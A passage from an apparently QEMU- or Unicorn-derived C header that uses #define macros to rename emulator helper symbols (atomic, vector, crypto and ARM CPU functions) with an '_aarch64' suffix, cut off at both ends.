helper_atomic_cmpxchgq_le_mmu_aarch64 #define helper_atomic_xchgq_le_mmu helper_atomic_xchgq_le_mmu_aarch64 #define helper_atomic_fetch_addq_le_mmu helper_atomic_fetch_addq_le_mmu_aarch64 #define helper_atomic_fetch_andq_le_mmu helper_atomic_fetch_andq_le_mmu_aarch64 #define helper_atomic_fetch_orq_le_mmu helper_atomic_fetch_orq_le_mmu_aarch64 #define helper_atomic_fetch_xorq_le_mmu helper_atomic_fetch_xorq_le_mmu_aarch64 #define helper_atomic_add_fetchq_le_mmu helper_atomic_add_fetchq_le_mmu_aarch64 #define helper_atomic_and_fetchq_le_mmu helper_atomic_and_fetchq_le_mmu_aarch64 #define helper_atomic_or_fetchq_le_mmu helper_atomic_or_fetchq_le_mmu_aarch64 #define helper_atomic_xor_fetchq_le_mmu helper_atomic_xor_fetchq_le_mmu_aarch64 #define helper_atomic_fetch_sminq_le_mmu helper_atomic_fetch_sminq_le_mmu_aarch64 #define helper_atomic_fetch_uminq_le_mmu helper_atomic_fetch_uminq_le_mmu_aarch64 #define helper_atomic_fetch_smaxq_le_mmu helper_atomic_fetch_smaxq_le_mmu_aarch64 #define helper_atomic_fetch_umaxq_le_mmu helper_atomic_fetch_umaxq_le_mmu_aarch64 #define helper_atomic_smin_fetchq_le_mmu helper_atomic_smin_fetchq_le_mmu_aarch64 #define helper_atomic_umin_fetchq_le_mmu helper_atomic_umin_fetchq_le_mmu_aarch64 #define helper_atomic_smax_fetchq_le_mmu helper_atomic_smax_fetchq_le_mmu_aarch64 #define helper_atomic_umax_fetchq_le_mmu helper_atomic_umax_fetchq_le_mmu_aarch64 #define helper_atomic_cmpxchgq_be_mmu helper_atomic_cmpxchgq_be_mmu_aarch64 #define helper_atomic_xchgq_be_mmu helper_atomic_xchgq_be_mmu_aarch64 #define helper_atomic_fetch_andq_be_mmu helper_atomic_fetch_andq_be_mmu_aarch64 #define helper_atomic_fetch_orq_be_mmu helper_atomic_fetch_orq_be_mmu_aarch64 #define helper_atomic_fetch_xorq_be_mmu helper_atomic_fetch_xorq_be_mmu_aarch64 #define helper_atomic_and_fetchq_be_mmu helper_atomic_and_fetchq_be_mmu_aarch64 #define helper_atomic_or_fetchq_be_mmu helper_atomic_or_fetchq_be_mmu_aarch64 #define helper_atomic_xor_fetchq_be_mmu helper_atomic_xor_fetchq_be_mmu_aarch64 #define helper_atomic_fetch_sminq_be_mmu helper_atomic_fetch_sminq_be_mmu_aarch64 #define helper_atomic_fetch_uminq_be_mmu helper_atomic_fetch_uminq_be_mmu_aarch64 #define helper_atomic_fetch_smaxq_be_mmu helper_atomic_fetch_smaxq_be_mmu_aarch64 #define helper_atomic_fetch_umaxq_be_mmu helper_atomic_fetch_umaxq_be_mmu_aarch64 #define helper_atomic_smin_fetchq_be_mmu helper_atomic_smin_fetchq_be_mmu_aarch64 #define helper_atomic_umin_fetchq_be_mmu helper_atomic_umin_fetchq_be_mmu_aarch64 #define helper_atomic_smax_fetchq_be_mmu helper_atomic_smax_fetchq_be_mmu_aarch64 #define helper_atomic_umax_fetchq_be_mmu helper_atomic_umax_fetchq_be_mmu_aarch64 #define helper_atomic_fetch_addq_be_mmu helper_atomic_fetch_addq_be_mmu_aarch64 #define helper_atomic_add_fetchq_be_mmu helper_atomic_add_fetchq_be_mmu_aarch64 #define helper_atomic_cmpxchgb helper_atomic_cmpxchgb_aarch64 #define helper_atomic_xchgb helper_atomic_xchgb_aarch64 #define helper_atomic_fetch_addb helper_atomic_fetch_addb_aarch64 #define helper_atomic_fetch_andb helper_atomic_fetch_andb_aarch64 #define helper_atomic_fetch_orb helper_atomic_fetch_orb_aarch64 #define helper_atomic_fetch_xorb helper_atomic_fetch_xorb_aarch64 #define helper_atomic_add_fetchb helper_atomic_add_fetchb_aarch64 #define helper_atomic_and_fetchb helper_atomic_and_fetchb_aarch64 #define helper_atomic_or_fetchb helper_atomic_or_fetchb_aarch64 #define helper_atomic_xor_fetchb helper_atomic_xor_fetchb_aarch64 #define helper_atomic_fetch_sminb helper_atomic_fetch_sminb_aarch64 #define helper_atomic_fetch_uminb helper_atomic_fetch_uminb_aarch64 #define helper_atomic_fetch_smaxb helper_atomic_fetch_smaxb_aarch64 #define helper_atomic_fetch_umaxb helper_atomic_fetch_umaxb_aarch64 #define helper_atomic_smin_fetchb helper_atomic_smin_fetchb_aarch64 #define helper_atomic_umin_fetchb helper_atomic_umin_fetchb_aarch64 #define helper_atomic_smax_fetchb helper_atomic_smax_fetchb_aarch64 #define helper_atomic_umax_fetchb helper_atomic_umax_fetchb_aarch64 #define helper_atomic_cmpxchgw_le helper_atomic_cmpxchgw_le_aarch64 #define helper_atomic_xchgw_le helper_atomic_xchgw_le_aarch64 #define helper_atomic_fetch_addw_le helper_atomic_fetch_addw_le_aarch64 #define helper_atomic_fetch_andw_le helper_atomic_fetch_andw_le_aarch64 #define helper_atomic_fetch_orw_le helper_atomic_fetch_orw_le_aarch64 #define helper_atomic_fetch_xorw_le helper_atomic_fetch_xorw_le_aarch64 #define helper_atomic_add_fetchw_le helper_atomic_add_fetchw_le_aarch64 #define helper_atomic_and_fetchw_le helper_atomic_and_fetchw_le_aarch64 #define helper_atomic_or_fetchw_le helper_atomic_or_fetchw_le_aarch64 #define helper_atomic_xor_fetchw_le helper_atomic_xor_fetchw_le_aarch64 #define helper_atomic_fetch_sminw_le helper_atomic_fetch_sminw_le_aarch64 #define helper_atomic_fetch_uminw_le helper_atomic_fetch_uminw_le_aarch64 #define helper_atomic_fetch_smaxw_le helper_atomic_fetch_smaxw_le_aarch64 #define helper_atomic_fetch_umaxw_le helper_atomic_fetch_umaxw_le_aarch64 #define helper_atomic_smin_fetchw_le helper_atomic_smin_fetchw_le_aarch64 #define helper_atomic_umin_fetchw_le helper_atomic_umin_fetchw_le_aarch64 #define helper_atomic_smax_fetchw_le helper_atomic_smax_fetchw_le_aarch64 #define helper_atomic_umax_fetchw_le helper_atomic_umax_fetchw_le_aarch64 #define helper_atomic_cmpxchgw_be helper_atomic_cmpxchgw_be_aarch64 #define helper_atomic_xchgw_be helper_atomic_xchgw_be_aarch64 #define helper_atomic_fetch_andw_be helper_atomic_fetch_andw_be_aarch64 #define helper_atomic_fetch_orw_be helper_atomic_fetch_orw_be_aarch64 #define helper_atomic_fetch_xorw_be helper_atomic_fetch_xorw_be_aarch64 #define helper_atomic_and_fetchw_be helper_atomic_and_fetchw_be_aarch64 #define helper_atomic_or_fetchw_be helper_atomic_or_fetchw_be_aarch64 #define helper_atomic_xor_fetchw_be helper_atomic_xor_fetchw_be_aarch64 #define helper_atomic_fetch_sminw_be helper_atomic_fetch_sminw_be_aarch64 #define helper_atomic_fetch_uminw_be helper_atomic_fetch_uminw_be_aarch64 #define helper_atomic_fetch_smaxw_be helper_atomic_fetch_smaxw_be_aarch64 #define helper_atomic_fetch_umaxw_be helper_atomic_fetch_umaxw_be_aarch64 #define helper_atomic_smin_fetchw_be helper_atomic_smin_fetchw_be_aarch64 #define helper_atomic_umin_fetchw_be helper_atomic_umin_fetchw_be_aarch64 #define helper_atomic_smax_fetchw_be helper_atomic_smax_fetchw_be_aarch64 #define helper_atomic_umax_fetchw_be helper_atomic_umax_fetchw_be_aarch64 #define helper_atomic_fetch_addw_be helper_atomic_fetch_addw_be_aarch64 #define helper_atomic_add_fetchw_be helper_atomic_add_fetchw_be_aarch64 #define helper_atomic_cmpxchgl_le helper_atomic_cmpxchgl_le_aarch64 #define helper_atomic_xchgl_le helper_atomic_xchgl_le_aarch64 #define helper_atomic_fetch_addl_le helper_atomic_fetch_addl_le_aarch64 #define helper_atomic_fetch_andl_le helper_atomic_fetch_andl_le_aarch64 #define helper_atomic_fetch_orl_le helper_atomic_fetch_orl_le_aarch64 #define helper_atomic_fetch_xorl_le helper_atomic_fetch_xorl_le_aarch64 #define helper_atomic_add_fetchl_le helper_atomic_add_fetchl_le_aarch64 #define helper_atomic_and_fetchl_le helper_atomic_and_fetchl_le_aarch64 #define helper_atomic_or_fetchl_le helper_atomic_or_fetchl_le_aarch64 #define helper_atomic_xor_fetchl_le helper_atomic_xor_fetchl_le_aarch64 #define helper_atomic_fetch_sminl_le helper_atomic_fetch_sminl_le_aarch64 #define helper_atomic_fetch_uminl_le helper_atomic_fetch_uminl_le_aarch64 #define helper_atomic_fetch_smaxl_le helper_atomic_fetch_smaxl_le_aarch64 #define helper_atomic_fetch_umaxl_le helper_atomic_fetch_umaxl_le_aarch64 #define helper_atomic_smin_fetchl_le helper_atomic_smin_fetchl_le_aarch64 #define helper_atomic_umin_fetchl_le helper_atomic_umin_fetchl_le_aarch64 #define helper_atomic_smax_fetchl_le helper_atomic_smax_fetchl_le_aarch64 #define helper_atomic_umax_fetchl_le helper_atomic_umax_fetchl_le_aarch64 #define helper_atomic_cmpxchgl_be helper_atomic_cmpxchgl_be_aarch64 #define helper_atomic_xchgl_be helper_atomic_xchgl_be_aarch64 #define helper_atomic_fetch_andl_be helper_atomic_fetch_andl_be_aarch64 #define helper_atomic_fetch_orl_be helper_atomic_fetch_orl_be_aarch64 #define helper_atomic_fetch_xorl_be helper_atomic_fetch_xorl_be_aarch64 #define helper_atomic_and_fetchl_be helper_atomic_and_fetchl_be_aarch64 #define helper_atomic_or_fetchl_be helper_atomic_or_fetchl_be_aarch64 #define helper_atomic_xor_fetchl_be helper_atomic_xor_fetchl_be_aarch64 #define helper_atomic_fetch_sminl_be helper_atomic_fetch_sminl_be_aarch64 #define helper_atomic_fetch_uminl_be helper_atomic_fetch_uminl_be_aarch64 #define helper_atomic_fetch_smaxl_be helper_atomic_fetch_smaxl_be_aarch64 #define helper_atomic_fetch_umaxl_be helper_atomic_fetch_umaxl_be_aarch64 #define helper_atomic_smin_fetchl_be helper_atomic_smin_fetchl_be_aarch64 #define helper_atomic_umin_fetchl_be helper_atomic_umin_fetchl_be_aarch64 #define helper_atomic_smax_fetchl_be helper_atomic_smax_fetchl_be_aarch64 #define helper_atomic_umax_fetchl_be helper_atomic_umax_fetchl_be_aarch64 #define helper_atomic_fetch_addl_be helper_atomic_fetch_addl_be_aarch64 #define helper_atomic_add_fetchl_be helper_atomic_add_fetchl_be_aarch64 #define helper_atomic_cmpxchgq_le helper_atomic_cmpxchgq_le_aarch64 #define helper_atomic_xchgq_le helper_atomic_xchgq_le_aarch64 #define helper_atomic_fetch_addq_le helper_atomic_fetch_addq_le_aarch64 #define helper_atomic_fetch_andq_le helper_atomic_fetch_andq_le_aarch64 #define helper_atomic_fetch_orq_le helper_atomic_fetch_orq_le_aarch64 #define helper_atomic_fetch_xorq_le helper_atomic_fetch_xorq_le_aarch64 #define helper_atomic_add_fetchq_le helper_atomic_add_fetchq_le_aarch64 #define helper_atomic_and_fetchq_le helper_atomic_and_fetchq_le_aarch64 #define helper_atomic_or_fetchq_le helper_atomic_or_fetchq_le_aarch64 #define helper_atomic_xor_fetchq_le helper_atomic_xor_fetchq_le_aarch64 #define helper_atomic_fetch_sminq_le helper_atomic_fetch_sminq_le_aarch64 #define helper_atomic_fetch_uminq_le helper_atomic_fetch_uminq_le_aarch64 #define helper_atomic_fetch_smaxq_le helper_atomic_fetch_smaxq_le_aarch64 #define helper_atomic_fetch_umaxq_le helper_atomic_fetch_umaxq_le_aarch64 #define helper_atomic_smin_fetchq_le helper_atomic_smin_fetchq_le_aarch64 #define helper_atomic_umin_fetchq_le helper_atomic_umin_fetchq_le_aarch64 #define helper_atomic_smax_fetchq_le helper_atomic_smax_fetchq_le_aarch64 #define helper_atomic_umax_fetchq_le helper_atomic_umax_fetchq_le_aarch64 #define helper_atomic_cmpxchgq_be helper_atomic_cmpxchgq_be_aarch64 #define helper_atomic_xchgq_be helper_atomic_xchgq_be_aarch64 #define helper_atomic_fetch_andq_be helper_atomic_fetch_andq_be_aarch64 #define helper_atomic_fetch_orq_be helper_atomic_fetch_orq_be_aarch64 #define helper_atomic_fetch_xorq_be helper_atomic_fetch_xorq_be_aarch64 #define helper_atomic_and_fetchq_be helper_atomic_and_fetchq_be_aarch64 #define helper_atomic_or_fetchq_be helper_atomic_or_fetchq_be_aarch64 #define helper_atomic_xor_fetchq_be helper_atomic_xor_fetchq_be_aarch64 #define helper_atomic_fetch_sminq_be helper_atomic_fetch_sminq_be_aarch64 #define helper_atomic_fetch_uminq_be helper_atomic_fetch_uminq_be_aarch64 #define helper_atomic_fetch_smaxq_be helper_atomic_fetch_smaxq_be_aarch64 #define helper_atomic_fetch_umaxq_be helper_atomic_fetch_umaxq_be_aarch64 #define helper_atomic_smin_fetchq_be helper_atomic_smin_fetchq_be_aarch64 #define helper_atomic_umin_fetchq_be helper_atomic_umin_fetchq_be_aarch64 #define helper_atomic_smax_fetchq_be helper_atomic_smax_fetchq_be_aarch64 #define helper_atomic_umax_fetchq_be helper_atomic_umax_fetchq_be_aarch64 #define helper_atomic_fetch_addq_be helper_atomic_fetch_addq_be_aarch64 #define helper_atomic_add_fetchq_be helper_atomic_add_fetchq_be_aarch64 #define cpu_ldub_code cpu_ldub_code_aarch64 #define cpu_lduw_code cpu_lduw_code_aarch64 #define cpu_ldl_code cpu_ldl_code_aarch64 #define cpu_ldq_code cpu_ldq_code_aarch64 #define helper_div_i32 helper_div_i32_aarch64 #define helper_rem_i32 helper_rem_i32_aarch64 #define helper_divu_i32 helper_divu_i32_aarch64 #define helper_remu_i32 helper_remu_i32_aarch64 #define helper_shl_i64 helper_shl_i64_aarch64 #define helper_shr_i64 helper_shr_i64_aarch64 #define helper_sar_i64 helper_sar_i64_aarch64 #define helper_div_i64 helper_div_i64_aarch64 #define helper_rem_i64 helper_rem_i64_aarch64 #define helper_divu_i64 helper_divu_i64_aarch64 #define helper_remu_i64 helper_remu_i64_aarch64 #define helper_muluh_i64 helper_muluh_i64_aarch64 #define helper_mulsh_i64 helper_mulsh_i64_aarch64 #define helper_clz_i32 helper_clz_i32_aarch64 #define helper_ctz_i32 helper_ctz_i32_aarch64 #define helper_clz_i64 helper_clz_i64_aarch64 #define helper_ctz_i64 helper_ctz_i64_aarch64 #define helper_clrsb_i32 helper_clrsb_i32_aarch64 #define helper_clrsb_i64 helper_clrsb_i64_aarch64 #define helper_ctpop_i32 helper_ctpop_i32_aarch64 #define helper_ctpop_i64 helper_ctpop_i64_aarch64 #define helper_lookup_tb_ptr helper_lookup_tb_ptr_aarch64 #define helper_exit_atomic helper_exit_atomic_aarch64 #define helper_gvec_add8 helper_gvec_add8_aarch64 #define helper_gvec_add16 helper_gvec_add16_aarch64 #define helper_gvec_add32 helper_gvec_add32_aarch64 #define helper_gvec_add64 helper_gvec_add64_aarch64 #define helper_gvec_adds8 helper_gvec_adds8_aarch64 #define helper_gvec_adds16 helper_gvec_adds16_aarch64 #define helper_gvec_adds32 helper_gvec_adds32_aarch64 #define helper_gvec_adds64 helper_gvec_adds64_aarch64 #define helper_gvec_sub8 helper_gvec_sub8_aarch64 #define helper_gvec_sub16 helper_gvec_sub16_aarch64 #define helper_gvec_sub32 helper_gvec_sub32_aarch64 #define helper_gvec_sub64 helper_gvec_sub64_aarch64 #define helper_gvec_subs8 helper_gvec_subs8_aarch64 #define helper_gvec_subs16 helper_gvec_subs16_aarch64 #define helper_gvec_subs32 helper_gvec_subs32_aarch64 #define helper_gvec_subs64 helper_gvec_subs64_aarch64 #define helper_gvec_mul8 helper_gvec_mul8_aarch64 #define helper_gvec_mul16 helper_gvec_mul16_aarch64 #define helper_gvec_mul32 helper_gvec_mul32_aarch64 #define helper_gvec_mul64 helper_gvec_mul64_aarch64 #define helper_gvec_muls8 helper_gvec_muls8_aarch64 #define helper_gvec_muls16 helper_gvec_muls16_aarch64 #define helper_gvec_muls32 helper_gvec_muls32_aarch64 #define helper_gvec_muls64 helper_gvec_muls64_aarch64 #define helper_gvec_neg8 helper_gvec_neg8_aarch64 #define helper_gvec_neg16 helper_gvec_neg16_aarch64 #define helper_gvec_neg32 helper_gvec_neg32_aarch64 #define helper_gvec_neg64 helper_gvec_neg64_aarch64 #define helper_gvec_abs8 helper_gvec_abs8_aarch64 #define helper_gvec_abs16 helper_gvec_abs16_aarch64 #define helper_gvec_abs32 helper_gvec_abs32_aarch64 #define helper_gvec_abs64 helper_gvec_abs64_aarch64 #define helper_gvec_mov helper_gvec_mov_aarch64 #define helper_gvec_dup64 helper_gvec_dup64_aarch64 #define helper_gvec_dup32 helper_gvec_dup32_aarch64 #define helper_gvec_dup16 helper_gvec_dup16_aarch64 #define helper_gvec_dup8 helper_gvec_dup8_aarch64 #define helper_gvec_not helper_gvec_not_aarch64 #define helper_gvec_and helper_gvec_and_aarch64 #define helper_gvec_or helper_gvec_or_aarch64 #define helper_gvec_xor helper_gvec_xor_aarch64 #define helper_gvec_andc helper_gvec_andc_aarch64 #define helper_gvec_orc helper_gvec_orc_aarch64 #define helper_gvec_nand helper_gvec_nand_aarch64 #define helper_gvec_nor helper_gvec_nor_aarch64 #define helper_gvec_eqv helper_gvec_eqv_aarch64 #define helper_gvec_ands helper_gvec_ands_aarch64 #define helper_gvec_xors helper_gvec_xors_aarch64 #define helper_gvec_ors helper_gvec_ors_aarch64 #define helper_gvec_shl8i helper_gvec_shl8i_aarch64 #define helper_gvec_shl16i helper_gvec_shl16i_aarch64 #define helper_gvec_shl32i helper_gvec_shl32i_aarch64 #define helper_gvec_shl64i helper_gvec_shl64i_aarch64 #define helper_gvec_shr8i helper_gvec_shr8i_aarch64 #define helper_gvec_shr16i helper_gvec_shr16i_aarch64 #define helper_gvec_shr32i helper_gvec_shr32i_aarch64 #define helper_gvec_shr64i helper_gvec_shr64i_aarch64 #define helper_gvec_sar8i helper_gvec_sar8i_aarch64 #define helper_gvec_sar16i helper_gvec_sar16i_aarch64 #define helper_gvec_sar32i helper_gvec_sar32i_aarch64 #define helper_gvec_sar64i helper_gvec_sar64i_aarch64 #define helper_gvec_shl8v helper_gvec_shl8v_aarch64 #define helper_gvec_shl16v helper_gvec_shl16v_aarch64 #define helper_gvec_shl32v helper_gvec_shl32v_aarch64 #define helper_gvec_shl64v helper_gvec_shl64v_aarch64 #define helper_gvec_shr8v helper_gvec_shr8v_aarch64 #define helper_gvec_shr16v helper_gvec_shr16v_aarch64 #define helper_gvec_shr32v helper_gvec_shr32v_aarch64 #define helper_gvec_shr64v helper_gvec_shr64v_aarch64 #define helper_gvec_sar8v helper_gvec_sar8v_aarch64 #define helper_gvec_sar16v helper_gvec_sar16v_aarch64 #define helper_gvec_sar32v helper_gvec_sar32v_aarch64 #define helper_gvec_sar64v helper_gvec_sar64v_aarch64 #define helper_gvec_eq8 helper_gvec_eq8_aarch64 #define helper_gvec_ne8 helper_gvec_ne8_aarch64 #define helper_gvec_lt8 helper_gvec_lt8_aarch64 #define helper_gvec_le8 helper_gvec_le8_aarch64 #define helper_gvec_ltu8 helper_gvec_ltu8_aarch64 #define helper_gvec_leu8 helper_gvec_leu8_aarch64 #define helper_gvec_eq16 helper_gvec_eq16_aarch64 #define helper_gvec_ne16 helper_gvec_ne16_aarch64 #define helper_gvec_lt16 helper_gvec_lt16_aarch64 #define helper_gvec_le16 helper_gvec_le16_aarch64 #define helper_gvec_ltu16 helper_gvec_ltu16_aarch64 #define helper_gvec_leu16 helper_gvec_leu16_aarch64 #define helper_gvec_eq32 helper_gvec_eq32_aarch64 #define helper_gvec_ne32 helper_gvec_ne32_aarch64 #define helper_gvec_lt32 helper_gvec_lt32_aarch64 #define helper_gvec_le32 helper_gvec_le32_aarch64 #define helper_gvec_ltu32 helper_gvec_ltu32_aarch64 #define helper_gvec_leu32 helper_gvec_leu32_aarch64 #define helper_gvec_eq64 helper_gvec_eq64_aarch64 #define helper_gvec_ne64 helper_gvec_ne64_aarch64 #define helper_gvec_lt64 helper_gvec_lt64_aarch64 #define helper_gvec_le64 helper_gvec_le64_aarch64 #define helper_gvec_ltu64 helper_gvec_ltu64_aarch64 #define helper_gvec_leu64 helper_gvec_leu64_aarch64 #define helper_gvec_ssadd8 helper_gvec_ssadd8_aarch64 #define helper_gvec_ssadd16 helper_gvec_ssadd16_aarch64 #define helper_gvec_ssadd32 helper_gvec_ssadd32_aarch64 #define helper_gvec_ssadd64 helper_gvec_ssadd64_aarch64 #define helper_gvec_sssub8 helper_gvec_sssub8_aarch64 #define helper_gvec_sssub16 helper_gvec_sssub16_aarch64 #define helper_gvec_sssub32 helper_gvec_sssub32_aarch64 #define helper_gvec_sssub64 helper_gvec_sssub64_aarch64 #define helper_gvec_usadd8 helper_gvec_usadd8_aarch64 #define helper_gvec_usadd16 helper_gvec_usadd16_aarch64 #define helper_gvec_usadd32 helper_gvec_usadd32_aarch64 #define helper_gvec_usadd64 helper_gvec_usadd64_aarch64 #define helper_gvec_ussub8 helper_gvec_ussub8_aarch64 #define helper_gvec_ussub16 helper_gvec_ussub16_aarch64 #define helper_gvec_ussub32 helper_gvec_ussub32_aarch64 #define helper_gvec_ussub64 helper_gvec_ussub64_aarch64 #define helper_gvec_smin8 helper_gvec_smin8_aarch64 #define helper_gvec_smin16 helper_gvec_smin16_aarch64 #define helper_gvec_smin32 helper_gvec_smin32_aarch64 #define helper_gvec_smin64 helper_gvec_smin64_aarch64 #define helper_gvec_smax8 helper_gvec_smax8_aarch64 #define helper_gvec_smax16 helper_gvec_smax16_aarch64 #define helper_gvec_smax32 helper_gvec_smax32_aarch64 #define helper_gvec_smax64 helper_gvec_smax64_aarch64 #define helper_gvec_umin8 helper_gvec_umin8_aarch64 #define helper_gvec_umin16 helper_gvec_umin16_aarch64 #define helper_gvec_umin32 helper_gvec_umin32_aarch64 #define helper_gvec_umin64 helper_gvec_umin64_aarch64 #define helper_gvec_umax8 helper_gvec_umax8_aarch64 #define helper_gvec_umax16 helper_gvec_umax16_aarch64 #define helper_gvec_umax32 helper_gvec_umax32_aarch64 #define helper_gvec_umax64 helper_gvec_umax64_aarch64 #define helper_gvec_bitsel helper_gvec_bitsel_aarch64 #define cpu_restore_state cpu_restore_state_aarch64 #define page_collection_lock page_collection_lock_aarch64 #define page_collection_unlock page_collection_unlock_aarch64 #define free_code_gen_buffer free_code_gen_buffer_aarch64 #define tcg_exec_init tcg_exec_init_aarch64 #define tb_cleanup tb_cleanup_aarch64 #define tb_flush tb_flush_aarch64 #define tb_phys_invalidate tb_phys_invalidate_aarch64 #define tb_gen_code tb_gen_code_aarch64 #define tb_exec_lock tb_exec_lock_aarch64 #define tb_exec_unlock tb_exec_unlock_aarch64 #define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_aarch64 #define tb_invalidate_phys_range tb_invalidate_phys_range_aarch64 #define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_aarch64 #define tb_check_watchpoint tb_check_watchpoint_aarch64 #define cpu_io_recompile cpu_io_recompile_aarch64 #define tb_flush_jmp_cache tb_flush_jmp_cache_aarch64 #define tcg_flush_softmmu_tlb tcg_flush_softmmu_tlb_aarch64 #define translator_loop_temp_check translator_loop_temp_check_aarch64 #define translator_loop translator_loop_aarch64 #define helper_atomic_cmpxchgo_le_mmu helper_atomic_cmpxchgo_le_mmu_aarch64 #define helper_atomic_cmpxchgo_be_mmu helper_atomic_cmpxchgo_be_mmu_aarch64 #define helper_atomic_ldo_le_mmu helper_atomic_ldo_le_mmu_aarch64 #define helper_atomic_ldo_be_mmu helper_atomic_ldo_be_mmu_aarch64 #define helper_atomic_sto_le_mmu helper_atomic_sto_le_mmu_aarch64 #define helper_atomic_sto_be_mmu helper_atomic_sto_be_mmu_aarch64 #define unassigned_mem_ops unassigned_mem_ops_aarch64 #define floatx80_infinity floatx80_infinity_aarch64 #define dup_const_func dup_const_func_aarch64 #define gen_helper_raise_exception gen_helper_raise_exception_aarch64 #define gen_helper_raise_interrupt gen_helper_raise_interrupt_aarch64 #define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_aarch64 #define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_aarch64 #define gen_helper_cpsr_read gen_helper_cpsr_read_aarch64 #define gen_helper_cpsr_write gen_helper_cpsr_write_aarch64 #define tlb_reset_dirty_by_vaddr tlb_reset_dirty_by_vaddr_aarch64 #define cpu_aarch64_init cpu_aarch64_init_aarch64 #define arm_cpu_exec_interrupt arm_cpu_exec_interrupt_aarch64 #define arm_cpu_update_virq arm_cpu_update_virq_aarch64 #define arm_cpu_update_vfiq arm_cpu_update_vfiq_aarch64 #define arm_cpu_initfn arm_cpu_initfn_aarch64 #define gt_cntfrq_period_ns gt_cntfrq_period_ns_aarch64 #define arm_cpu_post_init arm_cpu_post_init_aarch64 #define arm_cpu_realizefn arm_cpu_realizefn_aarch64 #define arm_cpu_class_init arm_cpu_class_init_aarch64 #define cpu_arm_init cpu_arm_init_aarch64 #define helper_crypto_aese helper_crypto_aese_aarch64 #define helper_crypto_aesmc helper_crypto_aesmc_aarch64 #define helper_crypto_sha1_3reg helper_crypto_sha1_3reg_aarch64 #define helper_crypto_sha1h helper_crypto_sha1h_aarch64 #define helper_crypto_sha1su1 helper_crypto_sha1su1_aarch64 #define helper_crypto_sha256h helper_crypto_sha256h_aarch64 #define helper_crypto_sha256h2 helper_crypto_sha256h2_aarch64 #define helper_crypto_sha256su0 helper_crypto_sha256su0_aarch64 #define helper_crypto_sha256su1 helper_crypto_sha256su1_aarch64 #define helper_crypto_sha512h helper_crypto_sha512h_aarch64 #define helper_crypto_sha512h2 helper_crypto_sha512h2_aarch64 #define helper_crypto_sha512su0 helper_crypto_sha512su0_aarch64 #define helper_crypto_sha512su1 helper_crypto_sha512su1_aarch64 #define helper_crypto_sm3partw1 helper_crypto_sm3partw1_aarch64 #define helper_crypto_sm3partw2 helper_crypto_sm3partw2_aarch64 #define helper_crypto_sm3tt helper_crypto_sm3tt_aarch64 #define helper_crypto_sm4e helper_crypto_sm4e_aarch64 #define helper_crypto_sm4ekey helper_crypto_sm4ekey_aarch64 #define helper_check_breakpoints helper_check_breakpoints_aarch64 #define arm_debug_check_watchpoint arm_debug_check_watchpoint_aarch64 #define arm_debug_excp_handler arm_debug_excp_handler_aarch64 #define arm_adjust_watchpoint_address arm_adjust_watchpoint_address_aarch64 #define helper_udiv64 helper_udiv64_aarch64 #define helper_sdiv64 helper_sdiv64_aarch64 #define helper_rbit64 helper_rbit64_aarch64 #define helper_msr_i_spsel helper_msr_i_spsel_aarch64 #define helper_msr_i_daifset helper_msr_i_daifset_aarch64 #define helper_msr_i_daifclear helper_msr_i_daifclear_aarch64 #define helper_vfp_cmph_a64 helper_vfp_cmph_a64_aarch64 #define helper_vfp_cmpeh_a64 helper_vfp_cmpeh_a64_aarch64 #define helper_vfp_cmps_a64 helper_vfp_cmps_a64_aarch64 #define helper_vfp_cmpes_a64 helper_vfp_cmpes_a64_aarch64 #define helper_vfp_cmpd_a64 helper_vfp_cmpd_a64_aarch64 #define helper_vfp_cmped_a64 helper_vfp_cmped_a64_aarch64 #define helper_vfp_mulxs helper_vfp_mulxs_aarch64 #define helper_vfp_mulxd helper_vfp_mulxd_aarch64 #define helper_simd_tbl helper_simd_tbl_aarch64 #define helper_neon_ceq_f64 helper_neon_ceq_f64_aarch64 #define helper_neon_cge_f64 helper_neon_cge_f64_aarch64 #define helper_neon_cgt_f64 helper_neon_cgt_f64_aarch64 #define helper_recpsf_f16 helper_recpsf_f16_aarch64 #define helper_recpsf_f32 helper_recpsf_f32_aarch64 #define helper_recpsf_f64 helper_recpsf_f64_aarch64 #define helper_rsqrtsf_f16 helper_rsqrtsf_f16_aarch64 #define helper_rsqrtsf_f32 helper_rsqrtsf_f32_aarch64 #define helper_rsqrtsf_f64 helper_rsqrtsf_f64_aarch64 #define helper_neon_addlp_s8 helper_neon_addlp_s8_aarch64 #define helper_neon_addlp_u8 helper_neon_addlp_u8_aarch64 #define helper_neon_addlp_s16 helper_neon_addlp_s16_aarch64 #define helper_neon_addlp_u16 helper_neon_addlp_u16_aarch64 #define helper_frecpx_f16 helper_frecpx_f16_aarch64 #define helper_frecpx_f32 helper_frecpx_f32_aarch64 #define helper_frecpx_f64 helper_frecpx_f64_aarch64 #define helper_fcvtx_f64_to_f32 helper_fcvtx_f64_to_f32_aarch64 #define helper_crc32_64 helper_crc32_64_aarch64 #define helper_crc32c_64 helper_crc32c_64_aarch64 #define helper_paired_cmpxchg64_le helper_paired_cmpxchg64_le_aarch64 #define helper_paired_cmpxchg64_le_parallel helper_paired_cmpxchg64_le_parallel_aarch64 #define helper_paired_cmpxchg64_be helper_paired_cmpxchg64_be_aarch64 #define helper_paired_cmpxchg64_be_parallel helper_paired_cmpxchg64_be_parallel_aarch64 #define helper_casp_le_parallel helper_casp_le_parallel_aarch64 #define helper_casp_be_parallel helper_casp_be_parallel_aarch64 #define helper_advsimd_addh helper_advsimd_addh_aarch64 #define helper_advsimd_subh helper_advsimd_subh_aarch64 #define helper_advsimd_mulh helper_advsimd_mulh_aarch64 #define helper_advsimd_divh helper_advsimd_divh_aarch64 #define helper_advsimd_minh helper_advsimd_minh_aarch64 #define helper_advsimd_maxh helper_advsimd_maxh_aarch64 #define helper_advsimd_minnumh helper_advsimd_minnumh_aarch64 #define helper_advsimd_maxnumh helper_advsimd_maxnumh_aarch64 #define helper_advsimd_add2h helper_advsimd_add2h_aarch64 #define helper_advsimd_sub2h helper_advsimd_sub2h_aarch64 #define helper_advsimd_mul2h helper_advsimd_mul2h_aarch64 #define helper_advsimd_div2h helper_advsimd_div2h_aarch64 #define helper_advsimd_min2h helper_advsimd_min2h_aarch64 #define helper_advsimd_max2h helper_advsimd_max2h_aarch64 #define helper_advsimd_minnum2h helper_advsimd_minnum2h_aarch64 #define helper_advsimd_maxnum2h helper_advsimd_maxnum2h_aarch64 #define helper_advsimd_mulxh helper_advsimd_mulxh_aarch64 #define helper_advsimd_mulx2h 